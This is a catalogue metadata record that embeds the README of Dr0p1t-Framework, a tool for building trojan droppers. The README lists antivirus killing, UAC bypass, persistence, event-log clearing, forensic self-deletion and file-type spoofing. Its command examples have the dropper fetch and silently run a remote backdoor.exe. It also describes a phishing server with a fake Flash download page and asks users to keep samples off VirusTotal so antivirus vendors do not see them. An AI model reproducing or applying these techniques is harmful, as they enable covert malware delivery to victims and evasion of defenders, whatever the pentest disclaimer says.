{"id":13539767,"url":"https://github.com/d4vinci/dr0p1t-framework","last_synced_at":"2025-10-02T07:30:33.589Z","repository":{"id":40499512,"uuid":"81683268","full_name":"D4Vinci/Dr0p1t-Framework","owner":"D4Vinci","description":"A framework that create an advanced stealthy dropper that bypass most AVs and have a lot of tricks","archived":true,"fork":false,"pushed_at":"2018-11-03T19:00:12.000Z","size":7634,"stargazers_count":1422,"open_issues_count":5,"forks_count":381,"subscribers_count":109,"default_branch":"master","last_synced_at":"2025-09-19T07:14:42.252Z","etag":null,"topics":["anti-forensics","avs","backdoor","dr0p1t","execution-policy-bypass","hacking","hacking-tool","kali-linux","kill-antivirus","malware","pentest","persistence","phishing","powershell","runas","scam","social-engineering","spoofing","uac-bypass","windows-hacking"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/D4Vinci.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2017-02-11T21:24:11.000Z","updated_at":"2025-09-17T18:43:29.000Z","dependencies_parsed_at":"2022-07-13T07:50:54.606Z","dependency_job_id":null,"html_url":"https://github.com/D4Vinci/Dr0p1t-Framework","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/D4Vinci/Dr0p1t-Framework","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D4Vinci%2FDr0p1t-Framework","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D4Vinci%2FDr0p1t-Framework/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D4Vinci%2FDr0p1t-Framework/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D4Vinci%2FDr0p1t-Framework/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/D4Vinci","download_url":"https://codeload.github.com/D4Vinci/Dr0p1t-Framework/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D4Vinci%2FDr0p1t-Framework/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":277974403,"owners_count":25908396,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-02T02:00:08.890Z","response_time":67,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["anti-forensics","avs","backdoor","dr0p1t","execution-policy-bypass","hacking","hacking-tool","kali-linux","kill-antivirus","malware","pentest","persistence","phishing","powershell","runas","scam","social-engineering","spoofing","uac-bypass","windows-hacking"],"created_at":"2024-08-01T09:01:31.637Z","updated_at":"2025-10-02T07:30:33.157Z","avatar_url":"https://github.com/D4Vinci.png","language":"Python","funding_links":["https://buymeacoffee.com/d4vinci"],"categories":["\u003ca id=\"1233584261c0cd5224b6e90a98cc9a94\"\u003e\u003c/a\u003e渗透\u0026\u0026offensive\u0026\u0026渗透框架\u0026\u0026后渗透框架","\u003ca id=\"783f861b9f822127dba99acb55687cbb\"\u003e\u003c/a\u003e工具"],"sub_categories":["\u003ca id=\"80301821d0f5d8ec2dd3754ebb1b4b10\"\u003e\u003c/a\u003ePayload\u0026\u0026远控\u0026\u0026RAT","\u003ca id=\"ad92f6b801a18934f1971e2512f5ae4f\"\u003e\u003c/a\u003ePayload生成"],"readme":"# Not maintained currently (Wait for the next version)\n-----\n# Dr0p1t-Framework [![n0where best cybersecurity tools](https://img.shields.io/badge/25-n0where%20best%20cybersecurity%20tools-red.svg)](https://n0where.net/best-cybersecurity-tools) [![Python 3.5](https://img.shields.io/badge/Python-3.5-yellow.svg)](http://www.python.org/download/) [![Python 2.7](https://img.shields.io/badge/Python-2.7-yellow.svg)](http://www.python.org/download/) ![Build Status](https://img.shields.io/badge/Version-1.3.2.1-red.svg)\n\nHave you ever heard about trojan droppers ?\nIn short dropper is type of malware that downloads other malwares and Dr0p1t gives you the chance to create a stealthy dropper that bypass most AVs and have a lot of tricks ( Trust me :D ) ;)\n\n# Features\n**+ Generated executable properties:**\n- The executable size is smaller compared to other droppers generated the same way.\n- Download executable on target system and execute it silently..\n- Self destruct function so that the dropper will kill and delete itself after finishing it work\n- Escape disk forensics by making all the files dropper create and dropper also cleans its content before deletion\n- Clear event log after finishing.\n\n**+ Framework properties:**\n- Works with Windows, Linux and now have OSX support ( Thanks to @sm4sh3r )\n- Dr0p1t-Server feature (beta) so now you can work from browser [See how to work with Dr0p1t-Server](#work-with-dr0p1t-server)\n- Dr0p1t-Server have a scam option (beta) [See how to work with Dr0p1t-Server](#work-with-dr0p1t-server)\n\n**+ Modules:**\n- Find and kill antivirus before running the malware.\n- The ability to disable UAC.\n- The ability to run your malware as admin.\n- Full spoof by spoofing the file icon and extension to any thing you want.\n- ZIP files support so now you can compress your executable to zip file before uploading.\n- Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable\n- In running powershell scripts it can bypass execution policy\n- Using UPX to compress the dropper after creating it\n\n**+Persistence modules:**\n- Adding executable after downloading it to startup.\n- Adding executable after downloading it to task scheduler ( UAC not matters ).\n- Adding your file to powershell user profile so your file will be downloaded and ran every time powershell.exe run if it doesn't exist.\n\n# Screenshots\n## On Windows\n\u003cimg src=\"https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/Screenshots/Windows/WinTest-1.JPG\" width=\"100%\"\u003e\u003c/img\u003e\n\n[See more](https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/Screenshots/Windows)\n\n## On Linux (Kali linux)\n\u003cimg src=\"https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/Screenshots/Linux/LinuxTest-1.png\" width=\"100%\"\u003e\u003c/img\u003e\n\n[See more](https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/Screenshots/Linux)\n\n## On OSX\nStill not fully tested! Need some contributors and testers :smile:\n\n### Help menu\n```\nUsage: Dr0p1t.py Malware_Url [Options]\n\noptions:\n-h, --help      show this help message and exit\n-s              Add your malware to startup (Persistence)\n-t              Add your malware to task scheduler (Persistence)\n-a              Add your link to powershell user profile (Persistence)\n-k              Kill antivirus process before running your malware.\n-b              Run this batch script before running your malware. Check scripts folder\n-p              Run this powershell script before running your malware. Check scripts folder\n-v              Run this vbs script before running your malware. Check scripts folder\n--runas         Bypass UAC and run your malware as admin\n--spoof         Spoof the final file to an extension you choose.\n--zip           Tell Dr0p1t that the malware in the link is compressed as zip\n--upx           Use UPX to compress the final file.\n--nouac         Try to disable UAC on victim device\n-i              Use icon to the final file. Check icons folder.\n--noclearevent  Tell the framework to not clear the event logs on target machine after finish.\n--nocompile     Tell the framework to not compile the final file.\n--only32        Download your malware for 32 bit devices only\n--only64        Download your malware for 64 bit devices only\n-q              Stay quite ( no banner )\n-u              Check for updates\n-nd             Display less output information\n```\n### Examples\n```\n./Dr0p1t.py Malware_Url [Options]\n./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx\n./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32\n./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas\n./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip\n```\n# Prerequisites\n- Python 2 or Python 3.\n\n\u003eThe recommended version for Python 2 is 2.7.x , the recommended version for Python 3 is 3.5.x and don't use 3.6 because it's not supported yet by PyInstaller\n\n### Needed dependencies for Linux\n- apt\n- Others will be installed from install.sh file\n\n\u003eNote : You must have root access\n\n### Needed dependencies for windows\n- pip\n- Modules in windows_requirements.txt\n\n# Installation\n\u003eThere's a list here for all official videos for installing and using Dr0p1t [Playlist](https://www.youtube.com/playlist?list=PLn3wMo250kMb1w7W7sUcQi6smA77V2men)\n- On Linux\n```\ngit clone https://github.com/D4Vinci/Dr0p1t-Framework.git\nchmod 777 -R Dr0p1t-Framework\ncd Dr0p1t-Framework\nsudo chmod +x install.sh\n./install.sh\npython Dr0p1t.py\n```\n\n- On Windows (After downloading ZIP and upzip it)\n```\ncd Dr0p1t-Framework-master\npython -m pip install -r windows_requirements.txt\npython Dr0p1t.py\n```\n\u003eNote : in python 2.7 you don't have pip so install it first from get-pip.py script [Google it]\n\n### Tested on:\n\n- Kali Linux Rolling\n- Ubuntu 14.04-16.04 LTS\n- Windows 10/8.1/8\n\n# Work with Dr0p1t-Server\n\u003eNote : Server is still in beta version and it have a lot of features to add and also a better design [ Need a designer to contribute :D ]\n\n## Prerequisites\n- Stable internet connection.\n- Port 5000 not used and firewall configured to not block connection from it\n\n## Installation \u0026 run server\nOn Linux and Windows it's the same after installing Dr0p1t by doing the steps mentioned above, install modules in server_requirements.txt by using pip like :\n\n```\npython -m pip install -r server_requirements.txt\n```\nNow let's run our server script :\n\n```\npython Dr0p1t_Server.py\n```\nAfter running the server script, it will start to listen to all the connection coming to port 5000 using flask.\n\nNow to use the server from your device open in browser either 127.0.0.1:5000 or [Your IP]:5000.\n\nTo open it from other devices in LAN open [Your Local IP]:5000 and for other devices in WAN open [Your Global IP]:5000 but make sure first that you configured you router to forward port 5000 connection to you.\n\nAfter opening the serve page you will see a simple website with a simple design asking you for data needed [See server screenshots](#server-screenshots)\n\nThen submit the data then it will be verified through some processes then the exe file will be generated and you will be redirected to page telling you the scam link.\n\nAfter entering the link you will see a scam to download the dropper which it by default Adobe flash download page.\nTo replace the scam with yours replace the file \"Scam.html\" content with yours but remember the variables ( Don't remove it ).\n\n## Server screenshots\n\u003cimg src=\"https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/Screenshots/Linux/LinuxServerTest-1.png\" width=\"100%\"\u003e\u003c/img\u003e\n\u003cimg src=\"https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/Screenshots/Linux/LinuxServerTest-2.png\" width=\"100%\"\u003e\u003c/img\u003e\n\u003cimg src=\"https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/Screenshots/Linux/LinuxServerTest-3.png\" width=\"100%\"\u003e\u003c/img\u003e\n\u003cimg src=\"https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/Screenshots/Linux/LinuxServerTest-4.png\" width=\"100%\"\u003e\u003c/img\u003e\n\n[See more for Windows](https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/Screenshots/Windows)\n[See more for Linux](https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/Screenshots/Linux)\n\n# No distribute scan ( Please don't scan with virus total:3 )\n\u003cimg src=\"https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/Screenshots/nodistribute_scan.png\" width=\"100%\"\u003e\u003c/img\u003e\n\n## Todo [Check out this link](https://github.com/D4Vinci/Dr0p1t-Framework/projects/1)\n\n## Contact\n- [Twitter](https://twitter.com/D4Vinci1)\n\n## Donation\nIf this tool has been useful for you, feel free to thank me by buying me a coffee :)\n\n[![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoffee.com/d4vinci)\n\n## Disclaimer\nDr0p1t Framework not responsible for misuse and for illegal purposes. Use it only for Pentest or educational purpose !!!\n\nCopying a code from this framework or using it in another tool is accepted as you mention where you get it from :smile:\n\n\u003e Pull requests are always welcomed :D\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fd4vinci%2Fdr0p1t-framework","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fd4vinci%2Fdr0p1t-framework","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fd4vinci%2Fdr0p1t-framework/lists"}